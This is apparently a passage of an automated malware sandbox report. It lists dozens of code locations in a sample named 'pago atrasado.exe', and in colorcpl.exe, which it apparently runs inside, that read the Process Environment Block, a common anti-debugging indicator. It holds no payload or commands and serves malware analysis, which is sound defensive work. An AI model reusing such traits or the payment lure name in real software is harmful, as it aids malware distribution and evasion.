          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04550050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04550050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04601074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
